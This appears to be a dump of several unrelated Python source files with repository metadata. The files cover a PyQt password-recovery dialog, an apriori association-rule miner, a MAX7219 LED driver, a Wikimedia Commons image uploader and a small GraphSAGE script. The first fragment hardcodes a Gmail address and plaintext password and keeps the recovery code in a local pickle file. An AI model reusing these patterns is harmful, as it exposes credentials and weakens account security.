database = 'senior'
conn = pyodbc.connect('DRIVER={ODBC Driver 13 for SQL Server}; \
SERVER=' + server + '; \
DATABASE=' + database + '; \
Trusted_Connection=yes;')
cursor = conn.cursor()
insert_query = "Select email from headsInfo where email=?"
cursor.execute(insert_query, self.lineEdit_2.text())
result = cursor.fetchall()
if len(result) == 0:
self.incorrect.setText("invalid email/password!")
else:
try:
self.incorrect.setText("<strong>Loading...</strong>")
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
server.login('AuroraCameraApplication@gmail.com', 'Aurora1234')
rand = randint(100000, 999999)
pickle.dump(rand, open("rand.dat", "wb"))
print(rand)
subject = "Recover Password"
msg = "your recovery code is: " + str(rand) + " \nplease enter this code in the page that opened in the application"
message = 'Subject: {}\n\n{}'.format(subject, msg)
#str(self.lineEdit_2.text())
server.sendmail('AuroraCameraApplication@gmail.com',str(self.lineEdit_2.text()), message)
server.quit()
self.timer = QtCore.QTimer()
self.timer.start(35)
QtCore.QTimer.singleShot(2000,lambda: self.message(LoginWindow))
QtCore.QTimer.singleShot(2000,lambda :self.incorrect.setText(""))
except Exception:
m = QMessageBox()
msg1 = "<html><head/><body><p align=\"center\"><span style=\" font-size:10pt; font-weight:600;\">No internet connection!</span></p><p>please check internet connection.</p></body></html>"
m.setText(msg1)
m.setStandardButtons(QMessageBox.Ok)
m.setWindowTitle("AURORA")
m.setIcon(QMessageBox.Information)
reply = m.exec()
def message(self,LoginWindow):
m = QMessageBox()
msg1="<html><head/><body><p align=\"center\"><span style=\" font-size:10pt; font-weight:600;\">recovery code sent to: "+str(self.lineEdit_2.text())+ " </span></p><p> please follow instructions in sent email</p></body></html>"
m.setText(msg1)
m.setStandardButtons(QMessageBox.Ok)
m.setWindowTitle("AURORA")
m.setIcon(QMessageBox.NoIcon)
m.setWindowFlag(Qt.FramelessWindowHint)
reply = m.exec()
if reply == QMessageBox.Ok:
self.open(LoginWindow)
def open(self,LoginWindow):
pickle.dump(self.lineEdit_2.text(), open("email.dat", "wb"))
self.window = QtWidgets.QMainWindow()
self.ui = verifyController.Verfifycontroller()
LoginWindow.close()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
LoginWindow = QtWidgets.QMainWindow()
ui = Ui_LoginWindow()
ui.setupUi(LoginWindow)
LoginWindow.show()
sys.exit(app.exec_())
| 52.209924
| 238
| 0.59288
| 13,013
| 0.951312
| 0
| 0
| 0
| 0
| 0
| 0
| 2,942
| 0.215074
|
0b306e809cb7c5ad319eabca404494268373c70e
| 13,195
|
py
|
Python
|
ml/association/apriori.py
|
thorwhalen/ut
|
353a4629c35a2cca76ef91a4d5209afe766433b4
|
[
"MIT"
] | 4
|
2016-12-17T20:06:10.000Z
|
2021-11-19T04:45:29.000Z
|
ml/association/apriori.py
|
thorwhalen/ut
|
353a4629c35a2cca76ef91a4d5209afe766433b4
|
[
"MIT"
] | 11
|
2021-01-06T05:35:11.000Z
|
2022-03-11T23:28:31.000Z
|
ml/association/apriori.py
|
thorwhalen/ut
|
353a4629c35a2cca76ef91a4d5209afe766433b4
|
[
"MIT"
] | 3
|
2015-06-12T10:44:16.000Z
|
2021-07-26T18:39:47.000Z
|
"""Association mining -- apriori algo"""
__author__ = 'thor'
from numpy import *
# Modified from:
# Everaldo Aguiar & Reid Johnson (https://github.com/cse40647/cse40647/blob/sp.14/10%20-%20Apriori.ipynb)
#
# Itself Modified from:
# Marcel Caraciolo (https://gist.github.com/marcelcaraciolo/1423287)
#
# Functions to compute and extract association rules from a given frequent
# itemset generated by the Apriori algorithm.
import pandas as pd
from statsmodels.stats.proportion import samplesize_confint_proportion
def choose_sample_size(min_confidence, alpha=0.05, half_length=None):
if half_length is None:
t = 0.20 * min_confidence if min_confidence < 0.5 else 0.20 * (1 - min_confidence)
half_length = max(0.01, t) # choose half length to be a proportion (0.2) of min_confidence
return samplesize_confint_proportion(
proportion=min_confidence,
half_length=half_length,
alpha=alpha,
method='normal')
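# Editor's note (illustrative numbers, not part of the original module): for
# min_confidence = 0.2 the half length above is max(0.01, 0.2 * 0.2) = 0.04, so
# statsmodels is asked for the sample size that pins a 0.2 proportion estimate
# within +/-0.04 at 95% confidence.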
def association_rules(dataset, min_confidence=0.2, min_support=None, output='dataframe', verbose=False):
assert 0 < min_confidence <= 1, "min_confidence must be between 0 and 1"
if min_support is None:
# if no min_support is given, choose it to be the sample size you need to get 95% conf in proportion estimate
min_support = choose_sample_size(min_confidence, alpha=0.05, half_length=None)
if min_support > 1:
min_support /= float(len(dataset))
F, support_data = apriori(dataset, min_support=min_support, verbose=False)
H = generate_rules(F, support_data, min_confidence=min_confidence, verbose=verbose)
if output == 'triple':
return H
elif output == 'dataframe':
def set_to_string(s):
return str(", ".join(s))
support_df = pd.DataFrame({'condition': list(map(set_to_string, list(support_data.keys()))),
'condition_frequency': list(support_data.values())})
support_df['condition_count'] = len(dataset) * support_df['condition_frequency']
d = pd.DataFrame([{'condition': set_to_string(condition),
'effect': set_to_string(effect),
'effect_frequency': support}
for condition, effect, support in H])
d = pd.merge(d, support_df, how='inner', on='condition')
d['condition_and_effect_count'] = d['effect_frequency'] * d['condition_count']
d = d[['condition', 'effect', 'effect_frequency', 'condition_count', 'condition_and_effect_count',
'condition_frequency']]
return d.sort_values('effect_frequency', ascending=False).reset_index(drop=True)  # DataFrame.sort was removed in pandas 0.20
def apriori(dataset, min_support=0.5, verbose=False):
"""Implements the Apriori algorithm.
The Apriori algorithm will iteratively generate new candidate
k-itemsets using the frequent (k-1)-itemsets found in the previous
iteration.
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate
candidate itemsets.
min_support : float
The minimum support threshold. Defaults to 0.5.
Returns
-------
F : list
The list of frequent itemsets.
support_data : dict
The support data for all candidate itemsets.
References
----------
.. [1] R. Agrawal, R. Srikant, "Fast Algorithms for Mining Association
Rules", 1994.
"""
C1 = create_candidates(dataset)
D = list(map(set, dataset))
F1, support_data = support_prune(D, C1, min_support, verbose=False) # prune candidate 1-itemsets
F = [F1] # list of frequent itemsets; initialized to frequent 1-itemsets
k = 2 # the itemset cardinality
while (len(F[k - 2]) > 0):
Ck = apriori_gen(F[k-2], k) # generate candidate itemsets
Fk, supK = support_prune(D, Ck, min_support) # prune candidate itemsets
support_data.update(supK) # update the support counts to reflect pruning
F.append(Fk) # add the pruned candidate itemsets to the list of frequent itemsets
k += 1
if verbose:
# Print a list of all the frequent itemsets.
for kset in F:
for item in kset:
print(("" \
+ "{" \
+ "".join(str(i) + ", " for i in iter(item)).rstrip(', ') \
+ "}" \
+ ": sup = " + str(round(support_data[item], 3))))
return F, support_data
def create_candidates(dataset, verbose=False):
"""Creates a list of candidate 1-itemsets from a list of transactions.
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate candidate
itemsets.
Returns
-------
The list of candidate itemsets (c1) passed as a frozenset (a set that is
immutable and hashable).
"""
c1 = [] # list of all items in the database of transactions
for transaction in dataset:
for item in transaction:
if not [item] in c1:
c1.append([item])
c1.sort()
if verbose:
# Print a list of all the candidate items.
print(("" \
+ "{" \
+ "".join(str(i[0]) + ", " for i in iter(c1)).rstrip(', ') \
+ "}"))
# Map c1 to a frozenset because it will be the key of a dictionary.
return list(map(frozenset, c1))
def support_prune(dataset, candidates, min_support, verbose=False):
"""Returns all candidate itemsets that meet a minimum support threshold.
By the apriori principle, if an itemset is frequent, then all of its
subsets must also be frequent. As a result, we can perform support-based
pruning to systematically control the exponential growth of candidate
itemsets. Thus, itemsets that do not meet the minimum support level are
pruned from the input list of itemsets (dataset).
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate candidate
itemsets.
candidates : frozenset
The list of candidate itemsets.
min_support : float
The minimum support threshold.
Returns
-------
retlist : list
The list of frequent itemsets.
support_data : dict
The support data for all candidate itemsets.
"""
sscnt = {} # set for support counts
for tid in dataset:
for can in candidates:
if can.issubset(tid):
sscnt.setdefault(can, 0)
sscnt[can] += 1
num_items = float(len(dataset)) # total number of transactions in the dataset
retlist = [] # array for unpruned itemsets
support_data = {} # set for support data for corresponding itemsets
for key in sscnt:
# Calculate the support of itemset key.
support = sscnt[key] / num_items
if support >= min_support:
retlist.insert(0, key)
support_data[key] = support
# Print a list of the pruned itemsets.
if verbose:
for kset in retlist:
for item in kset:
print(("{" + str(item) + "}"))
print("")
for key in sscnt:
print(("" \
+ "{" \
+ "".join([str(i) + ", " for i in iter(key)]).rstrip(', ') \
+ "}" \
+ ": sup = " + str(support_data[key])))
return retlist, support_data
def apriori_gen(freq_sets, k):
"""Generates candidate itemsets (via the F_k-1 x F_k-1 method).
This operation generates new candidate k-itemsets based on the frequent
(k-1)-itemsets found in the previous iteration. The candidate generation
procedure merges a pair of frequent (k-1)-itemsets only if their first k-2
items are identical.
Parameters
----------
freq_sets : list
The list of frequent (k-1)-itemsets.
k : integer
The cardinality of the current itemsets being evaluated.
Returns
-------
retlist : list
The list of merged frequent itemsets.
"""
retList = [] # list of merged frequent itemsets
lenLk = len(freq_sets) # number of frequent itemsets
for i in range(lenLk):
for j in range(i+1, lenLk):
a=list(freq_sets[i])
b=list(freq_sets[j])
a.sort()
b.sort()
F1 = a[:k-2] # first k-2 items of freq_sets[i]
F2 = b[:k-2] # first k-2 items of freq_sets[j]
if F1 == F2: # if the first k-2 items are identical
# Merge the frequent itemsets.
retList.append(freq_sets[i] | freq_sets[j])
return retList
def rules_from_conseq(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
"""Generates a set of candidate rules.
Parameters
----------
freq_set : frozenset
The complete list of frequent itemsets.
H : list
A list of frequent itemsets (of a particular length).
support_data : dict
The support data for all candidate itemsets.
rules : list
A potentially incomplete set of candidate rules above the minimum
confidence threshold.
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
"""
m = len(H[0])
if m == 1:
Hmp1 = calc_confidence(freq_set, H, support_data, rules, min_confidence, verbose)
if (len(freq_set) > (m+1)):
Hmp1 = apriori_gen(H, m+1) # generate candidate itemsets
Hmp1 = calc_confidence(freq_set, Hmp1, support_data, rules, min_confidence, verbose)
if len(Hmp1) > 1:
# If there are candidate rules above the minimum confidence
# threshold, recurse on the list of these candidate rules.
rules_from_conseq(freq_set, Hmp1, support_data, rules, min_confidence, verbose)
def calc_confidence(freq_set, H, support_data, rules, min_confidence=0.5, verbose=False):
"""Evaluates the generated rules.
One measurement for quantifying the goodness of association rules is
confidence. The confidence for a rule 'P implies H' (P -> H) is defined as
the support for P and H divided by the support for P
(support (P|H) / support(P)), where the | symbol denotes the set union
(thus P|H means all the items in set P or in set H).
To calculate the confidence, we iterate through the frequent itemsets and
associated support data. For each frequent itemset, we divide the support
of the itemset by the support of the antecedent (left-hand-side of the
rule).
Parameters
----------
freq_set : frozenset
The complete list of frequent itemsets.
H : list
A list of frequent itemsets (of a particular length).
min_support : float
The minimum support threshold.
rules : list
A potentially incomplete set of candidate rules above the minimum
confidence threshold.
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
Returns
-------
pruned_H : list
The list of candidate rules above the minimum confidence threshold.
"""
pruned_H = [] # list of candidate rules above the minimum confidence threshold
for conseq in H: # iterate over the frequent itemsets
conf = support_data[freq_set] / support_data[freq_set - conseq]
if conf >= min_confidence:
rules.append((freq_set - conseq, conseq, conf))
pruned_H.append(conseq)
if verbose:
print(("" \
+ "{" \
+ "".join([str(i) + ", " for i in iter(freq_set-conseq)]).rstrip(', ') \
+ "}" \
+ " ---> " \
+ "{" \
+ "".join([str(i) + ", " for i in iter(conseq)]).rstrip(', ') \
+ "}" \
+ ": conf = " + str(round(conf, 3)) \
+ ", sup = " + str(round(support_data[freq_set], 3))))
return pruned_H
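# Editor's note (worked example with illustrative numbers): if
# support({bread, milk}) = 0.6 and support({bread}) = 0.8, the rule
# {bread} -> {milk} has confidence 0.6 / 0.8 = 0.75, so it survives any
# min_confidence threshold up to 0.75.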
def generate_rules(F, support_data, min_confidence=0.5, verbose=True):
"""Generates a set of candidate rules from a list of frequent itemsets.
For each frequent itemset, we calculate the confidence of using a
particular item as the rule consequent (right-hand-side of the rule). By
testing and merging the remaining rules, we recursively create a list of
pruned rules.
Parameters
----------
F : list
A list of frequent itemsets.
support_data : dict
The corresponding support data for the frequent itemsets (L).
min_confidence : float
The minimum confidence threshold. Defaults to 0.5.
Returns
-------
rules : list
The list of candidate rules above the minimum confidence threshold.
"""
rules = []
for i in range(1, len(F)):
for freq_set in F[i]:
H1 = [frozenset([itemset]) for itemset in freq_set]
if (i > 1):
rules_from_conseq(freq_set, H1, support_data, rules, min_confidence, verbose)
else:
calc_confidence(freq_set, H1, support_data, rules, min_confidence, verbose)
return rules
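# Editor's note: minimal usage sketch, not part of the original module; the toy
# transactions are invented for illustration.
#
#   toy_dataset = [
#       ['bread', 'milk'],
#       ['bread', 'diapers', 'beer', 'eggs'],
#       ['milk', 'diapers', 'beer', 'cola'],
#       ['bread', 'milk', 'diapers', 'beer'],
#       ['bread', 'milk', 'diapers', 'cola'],
#   ]
#   F, support_data = apriori(toy_dataset, min_support=0.6)  # itemsets in >=60% of rows
#   rules = generate_rules(F, support_data, min_confidence=0.7, verbose=False)
#   # each rule is a (antecedent frozenset, consequent frozenset, confidence) triple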
| 35.093085
| 117
| 0.617582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,200
| 0.545661
|
0b3087eb0d5de6a063260501def92d99d71d6436
| 397
|
py
|
Python
|
setup.py
|
TechAtNYU/api-python
|
26cfa78208f30c41095484422cd1232aeddbfcb2
|
[
"MIT"
] | null | null | null |
setup.py
|
TechAtNYU/api-python
|
26cfa78208f30c41095484422cd1232aeddbfcb2
|
[
"MIT"
] | null | null | null |
setup.py
|
TechAtNYU/api-python
|
26cfa78208f30c41095484422cd1232aeddbfcb2
|
[
"MIT"
] | null | null | null |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
description='Tech@NYU API Python Client',
author='TechatNYU',
url='https://github.com/TechAtNYU/pytnyu',
author_email='hello@techatnyu.org',
version='0.0.4',
install_requires=['requests'],
namespace_packages=['pytnyu'],
packages=['pytnyu'],
name='pytnyu',
)
| 23.352941
| 46
| 0.677582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 138
| 0.347607
|
0b36a23da3938dd6a58c332d22bc21433cd520a7
| 2,949
|
py
|
Python
|
hardware/max7219.py
|
gcurtis79/letsrobot
|
0cb5fae07392ee3661036d138d8986c9705bcf0c
|
[
"Apache-2.0"
] | 26
|
2018-09-27T17:27:30.000Z
|
2022-03-04T20:37:18.000Z
|
hardware/max7219.py
|
gcurtis79/letsrobot
|
0cb5fae07392ee3661036d138d8986c9705bcf0c
|
[
"Apache-2.0"
] | 30
|
2018-10-15T03:54:58.000Z
|
2020-05-28T06:57:08.000Z
|
hardware/max7219.py
|
gcurtis79/letsrobot
|
0cb5fae07392ee3661036d138d8986c9705bcf0c
|
[
"Apache-2.0"
] | 16
|
2018-10-04T03:16:43.000Z
|
2021-04-25T06:59:49.000Z
|
import spidev
columns = [0x1,0x2,0x3,0x4,0x5,0x6,0x7,0x8]
LEDOn = [0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]
LEDOff = [0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0]
LEDEmoteSmile = [0x0,0x0,0x24,0x0,0x42,0x3C,0x0,0x0]
LEDEmoteSad = [0x0,0x0,0x24,0x0,0x0,0x3C,0x42,0x0]
LEDEmoteTongue = [0x0,0x0,0x24,0x0,0x42,0x3C,0xC,0x0]
LEDEmoteSurprise = [0x0,0x0,0x24,0x0,0x18,0x24,0x24,0x18]
spi = None
def setup(robot_config):
global LEDEmoteSmile
global LEDEmoteSad
global LEDEmoteTongue
global LEDEmoteSurprise
global module
global spi
#LED controlling
spi = spidev.SpiDev()
spi.open(0,0)
#VCC -> RPi Pin 2
#GND -> RPi Pin 6
#DIN -> RPi Pin 19
#CLK -> RPi Pin 23
#CS -> RPi Pin 24
# decoding:BCD
spi.writebytes([0x09])
spi.writebytes([0x00])
# Start with low brightness
spi.writebytes([0x0a])
spi.writebytes([0x03])
# scanlimit; 8 LEDs
spi.writebytes([0x0b])
spi.writebytes([0x07])
# Enter normal power-mode
spi.writebytes([0x0c])
spi.writebytes([0x01])
# Leave display-test mode (register 0x0F = 0x00 -> normal operation)
spi.writebytes([0x0f])
spi.writebytes([0x00])
rotate = robot_config.getint('max7219', 'ledrotate')
if rotate == 180:
LEDEmoteSmile = LEDEmoteSmile[::-1]
LEDEmoteSad = LEDEmoteSad[::-1]
LEDEmoteTongue = LEDEmoteTongue[::-1]
LEDEmoteSurprise = LEDEmoteSurprise[::-1]
SetLED_Off()
def SetLED_On():
for i in range(len(columns)):
spi.xfer([columns[i],LEDOn[i]])
def SetLED_Off():
for i in range(len(columns)):
spi.xfer([columns[i],LEDOff[i]])
def SetLED_E_Smiley():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSmile[i]])
def SetLED_E_Sad():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSad[i]])
def SetLED_E_Tongue():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteTongue[i]])
def SetLED_E_Surprised():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSurprise[i]])
def SetLED_Low():
# brightness MIN
spi.writebytes([0x0a])
spi.writebytes([0x00])
def SetLED_Med():
#brightness MED
spi.writebytes([0x0a])
spi.writebytes([0x06])
def SetLED_Full():
# brightness MAX
spi.writebytes([0x0a])
spi.writebytes([0x0F])
def move(args):
command = args['command']
if command == 'LED_OFF':
SetLED_Off()
if command == 'LED_FULL':
SetLED_On()
SetLED_Full()
if command == 'LED_MED':
SetLED_On()
SetLED_Med()
if command == 'LED_LOW':
SetLED_On()
SetLED_Low()
if command == 'LED_E_SMILEY':
SetLED_On()
SetLED_E_Smiley()
if command == 'LED_E_SAD':
SetLED_On()
SetLED_E_Sad()
if command == 'LED_E_TONGUE':
SetLED_On()
SetLED_E_Tongue()
if command == 'LED_E_SURPRISED':
SetLED_On()
SetLED_E_Surprised()
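# Editor's note: usage sketch, not part of the original module. setup() expects a
# ConfigParser-like object with a [max7219] section (per the getint() call above);
# the values below are illustrative, and real use needs the SPI hardware wired up:
#
#   import configparser
#   cfg = configparser.ConfigParser()
#   cfg.read_dict({'max7219': {'ledrotate': '180'}})
#   setup(cfg)
#   move({'command': 'LED_E_SMILEY'})   # show the smiley emote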
| 25.205128
| 57
| 0.617158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 375
| 0.127162
|
0b36b0a444f2d74d0736b72d8524d171de6f01c9
| 9,236
|
py
|
Python
|
kkl_wikicommons_upload.py
|
wmilbot/wikiscraper
|
c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7
|
[
"MIT"
] | 3
|
2018-11-14T14:06:09.000Z
|
2018-11-14T18:23:16.000Z
|
kkl_wikicommons_upload.py
|
wmilbot/wikiscraper
|
c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7
|
[
"MIT"
] | null | null | null |
kkl_wikicommons_upload.py
|
wmilbot/wikiscraper
|
c0e8c2ac45bcb275584fa6606c604ee7c9c9cea7
|
[
"MIT"
] | 2
|
2018-11-14T14:06:23.000Z
|
2019-09-22T08:25:55.000Z
|
#!/usr/bin/env python
from datapackage_pipelines.wrapper import ingest, spew
import logging, collections
from pipeline_params import get_pipeline_param_rows
from google.cloud import storage
from contextlib import contextmanager
from tempfile import mkdtemp
import os
import pywikibot
import time
from pywikibot.pagegenerators import GeneratorFactory
import datetime
from pywikibot.specialbots import UploadRobot
from pywikibot.data.api import APIError
import sys
from datapackage import Package
LICENSE_TEMPLATE = "PD-Israel"
SUPPORTED_TEMPLATE = "Supported by Wikimedia Israel|year=2018"
FILES_CATEGORY = "Files from JNF uploaded by Wikimedia Israel"
FILES_CATEGORY_ID = "Files_from_JNF_uploaded_by_Wikimedia_Israel"
DESCRIPTION_TEMPLATE=lambda description, datestring, source, author, jnfnum: """=={{int:filedesc}}==
{{Information
|description={{he|1=__DESCRIPTION__}}
|date=__DATESTRING__
|source={{he|1=__SOURCE__}}
|author={{he|1=__AUTHOR__}}
|permission=
|other versions=
|other fields={{Information field|Name=JNF Number|Value=__JNFNUM__}}
}}
=={{int:license-header}}==
{{__LICENSE__}}
{{__SUPPORTED__}}
[[Category:__FILESCAT__]]""".replace("__DATESTRING__", datestring) \
.replace("__SOURCE__", source) \
.replace("__AUTHOR__", author) \
.replace("__JNFNUM__", jnfnum) \
.replace("__DESCRIPTION__", description) \
.replace("__LICENSE__", LICENSE_TEMPLATE) \
.replace("__SUPPORTED__", SUPPORTED_TEMPLATE) \
.replace("__FILESCAT__", FILES_CATEGORY) \
@contextmanager
def temp_dir(*args, **kwargs):
dir = mkdtemp(*args, **kwargs)
try:
yield dir
except Exception:
if os.path.exists(dir):
os.rmdir(dir)
raise
@contextmanager
def temp_file(*args, **kwargs):
with temp_dir(*args, **kwargs) as dir:
file = os.path.join(dir, "temp")
try:
yield file
except Exception:
if os.path.exists(file):
os.unlink(file)
raise
@contextmanager
def throttle(delay_seconds=None):
delay_seconds = int(os.environ.get("THROTTLE_SECONDS", "1")) if not delay_seconds else delay_seconds
if hasattr(throttle, 'last_call'):
seconds_since_last_call = (datetime.datetime.now() - throttle.last_call).seconds
if seconds_since_last_call < delay_seconds:
logging.info("throttling {} seconds...".format(delay_seconds - seconds_since_last_call))
time.sleep(delay_seconds - seconds_since_last_call)
yield
throttle.last_call = datetime.datetime.now()
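# Editor's note: usage sketch, not part of the original module. Each
# `with throttle():` block sleeps until at least THROTTLE_SECONDS (default 1)
# have elapsed since the previous throttled call, e.g.:
#
#   with throttle(delay_seconds=5):
#       page.save(summary='update by wmilbot')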
def delete_page(page):
with throttle():
page.delete(reason="Deleting duplicated images created by bot", prompt=True, mark=True)
def get_gcs_bucket(consts):
logging.info("uploading from google storage bucket {}".format(consts["gcs_bucket"]))
gcs = storage.Client.from_service_account_json(consts["gcs_secret_file"])
return gcs.get_bucket(consts["gcs_bucket"])
def init_stats():
stats = {}
stats["num eligible for download"] = 0
stats["invalid resolution"] = 0
stats["invalid description"] = 0
stats["invalid source"] = 0
stats["invalid year"] = 0
stats["in skip list"] = 0
stats["skipped start at"] = 0
stats['invalid image_path'] = 0
return stats
def get_donum_from_row(row):
return row["image_path"].replace("/ArchiveTazlumim/TopSmlPathArc/Do", "").replace(".jpeg", "")
def is_valid_row(row, stats):
if row["width_px"] * row["height_px"] < 200 * 200:
stats["invalid resolution"] += 1
logging.info('invalid resolution: {} X {}'.format(row["width_px"], row["height_px"]))
return False
elif len(row["description"]) < 3:
stats["invalid description"] += 1
logging.info('invalid description: {}'.format(row["description"]))
return False
elif len(row["source"]) < 2:
stats["invalid source"] += 1
logging.info('invalid source: {}'.format(row["source"]))
return False
elif row["date"].year > 1947:
stats["invalid year"] += 1
logging.info('invalid year: {}'.format(row["date"]))
return False
elif 'mi:' in row['image_path']:
stats['invalid image_path'] += 1
logging.info('invalid image path: {}'.format(row['image_path']))
return False
else:
stats["num eligible for download"] += 1
return True
# def load_datapackage_resources(resources, stats):
# logging.info("Loading datapackage resources...")
# donums = {}
# start_at_donum = False
# reached_start_at = False
# for resource in resources:
# for row_num, row in enumerate(resource, start=1):
# donum = get_donum_from_row(row)
# if start_at_donum and not reached_start_at and donum != start_at_donum:
# stats["skipped start at"] += 1
# elif is_valid_row(row, stats):
# if start_at_donum and donum == start_at_donum:
# reached_start_at = True
# donums[donum] = row
# stats["num eligible for download"] += 1
# return donums
def upload(consts, parameters, row, donum, stats, retry_num=0):
if is_valid_row(row, stats):
if os.environ.get('WIKISCRAPER_DRY_RUN'):
site = None
else:
site = pywikibot.Site()
site.login()
gcs_bucket = get_gcs_bucket(consts)
blob = gcs_bucket.blob("data/kkl/images" + row["image_path"])
with temp_file() as filename:
blob.download_to_filename(filename)
logging.info(os.path.getsize(filename))
page_title = row["description"][:100] + "-JNF{}.jpeg".format(donum)
logging.info("page_title={}".format(page_title))
if os.environ.get('WIKISCRAPER_DRY_RUN'):
page = None
else:
page = pywikibot.FilePage(site, page_title)
assert page.site.family == 'commons', 'invalid page site: {}'.format(page.site)
page_text = DESCRIPTION_TEMPLATE(row["description"], str(row["date"]), 'ארכיון הצילומים של קק"ל',
row["source"], donum)
if os.environ.get('WIKISCRAPER_DRY_RUN'):
logging.info(" -- {} -- \n{}".format(filename, page_text))
else:
with throttle():
if not page.exists():
page.text = page_text
if page.upload(filename, comment="uploaded by wmilbot", ignore_warnings=True):
logging.info("uploaded successfully")
else:
raise Exception("Upload failed")
else:
page.get()
page.text = page_text
page.save(summary='update by wmilbot')
return True, ''
else:
return True, 'invalid row'
def ingest_spew():
raise NotImplementedError
# parameters, datapackage, resources = ingest()
# parameters = next(get_pipeline_param_rows(parameters["pipeline-id"], parameters["pipeline-parameters"]))
# consts = next(get_pipeline_param_rows('constants', 'kkl-parameters.csv'))
# gcs_bucket = get_gcs_bucket(consts)
# stats = init_stats()
# for donum, row in load_datapackage_resources(resources, stats).items():
# success, error = upload(gcs_bucket, parameters, row, donum)
# assert success
# spew(dict(datapackage, resources=[]), [])
def cli_upload(consts, parameters, start_donum=None, upload_limit=1):
reached_start_at = False if start_donum else True
num_uploaded = 0
package = Package('final-data/kkl/extended-metadata/datapackage.json')
stats = init_stats()
for row in package.get_resource('kkl').iter(keyed=True):
donum = get_donum_from_row(row)
if reached_start_at or donum == start_donum:
reached_start_at = True
success, error = upload(consts, parameters, row, donum, stats)
if success:
num_uploaded += 1
if upload_limit > 0 and num_uploaded >= upload_limit:
break
stats['num processed'] = num_uploaded
stats['last donum'] = donum
print(stats)
def cli():
parameters = next(get_pipeline_param_rows('kkl-wikicommons-upload', 'kkl-parameters.csv'))
consts = next(get_pipeline_param_rows('constants', 'kkl-parameters.csv'))
if len(sys.argv) > 2:
if sys.argv[2] == 'upload':
if len(sys.argv) > 3:
if sys.argv[3] == 'all':
cli_upload(consts, parameters, None, 0)
else:
cli_upload(consts, parameters, sys.argv[3])
else:
cli_upload(consts, parameters)
if sys.argv[2] == 'upload-after':
cli_upload(consts, parameters, sys.argv[3],
upload_limit=int(sys.argv[4]) if len(sys.argv) > 4 else 1)
if len(sys.argv) > 1 and sys.argv[1] == '--cli':
cli()
else:
ingest_spew()
| 37.092369
| 110
| 0.612711
| 0
| 0
| 992
| 0.107185
| 1,040
| 0.112372
| 0
| 0
| 3,114
| 0.336467
|
0b373158f05135f2dafba65a6ba39cdf0ba87c6d
| 1,348
|
py
|
Python
|
Badger/scripts/besdirac-wms-decaycard-get.py
|
zhangxt-ihep/IHEPDIRAC
|
fb53500a998adc43ff0c65c02caf492da2965de5
|
[
"MIT"
] | null | null | null |
Badger/scripts/besdirac-wms-decaycard-get.py
|
zhangxt-ihep/IHEPDIRAC
|
fb53500a998adc43ff0c65c02caf492da2965de5
|
[
"MIT"
] | 1
|
2021-03-04T08:48:38.000Z
|
2021-03-04T08:48:38.000Z
|
Badger/scripts/besdirac-wms-decaycard-get.py
|
zhangxt-ihep/IHEPDIRAC
|
fb53500a998adc43ff0c65c02caf492da2965de5
|
[
"MIT"
] | 2
|
2020-08-26T06:36:51.000Z
|
2021-03-04T08:08:34.000Z
|
#!/usr/bin/env python
import DIRAC
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Base import Script
Script.setUsageMessage( """
Get decay card metadata for the given LFNs from the File Catalog
Usage:
%s [option] lfn
""" % Script.scriptName )
fcType = 'FileCatalog'
Script.parseCommandLine( ignoreErrors = False )
options = Script.getUnprocessedSwitches()
args = Script.getPositionalArgs()
from DIRAC.Interfaces.API.Dirac import Dirac
dirac = Dirac()
from DIRAC.Resources.Catalog.FileCatalogClient import FileCatalogClient
fccType = 'DataManagement/FileCatalog'
fcc = FileCatalogClient(fccType)
def getMeta(lfn, metaname):
'''Get metadata'''
result = fcc.getDirectoryMetadata(lfn)
if not result['OK']:
print result['Message']
return
if result['Value'].has_key(metaname):
return result['Value'][metaname]
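# Editor's note: usage sketch, not part of the original script; the LFN below is
# illustrative. getMeta() returns the requested directory metadata value, or
# None when the catalog call fails or the key is absent:
#
#   card = getMeta('/bes/some/dir', 'decayCard')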
def main():
lfns = args
for lfn in lfns:
print '================================================================================'
print 'Decay card for: %s' % lfn
print '--------------------------------------------------------------------------------'
# print getMeta(lfn, 'jobOptions')
print getMeta(lfn, 'decayCard')
print '--------------------------------------------------------------------------------'
if __name__ == '__main__':
main()
| 25.923077
| 96
| 0.557864
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 519
| 0.385015
|
0b39211e58c62524837539f8c02eb738f733141e
| 1,037
|
py
|
Python
|
GraphSAGE/fix.py
|
attre2vec/attre2vec
|
f36a2581f3d17887d6201a76624d4ced93d6503f
|
[
"MIT"
] | null | null | null |
GraphSAGE/fix.py
|
attre2vec/attre2vec
|
f36a2581f3d17887d6201a76624d4ced93d6503f
|
[
"MIT"
] | null | null | null |
GraphSAGE/fix.py
|
attre2vec/attre2vec
|
f36a2581f3d17887d6201a76624d4ced93d6503f
|
[
"MIT"
] | null | null | null |
import pickle
import networkx as nx
import numpy as np
import torch
for name in ('cora', 'citeseer', 'pubmed'):
with open(f'data/datasets/{name}.pkl', 'rb') as fin:
dataset = pickle.load(fin)
test_graph = dataset['original_graph']
e2i = dataset['edge2idx']
H = dataset['H']
node_fts = torch.zeros((test_graph.number_of_nodes(), 128))
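# Assumption inferred from the slicing below: each edge feature vector
# (H[e2i[(u, v)]][3:-1]) holds the two endpoint embeddings concatenated,
# 128 dimensions per node.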
for u, v in test_graph.edges():
ef = H[e2i[(u, v)]][3:-1]
node_fts[u] = ef[:128]
node_fts[v] = ef[128:]
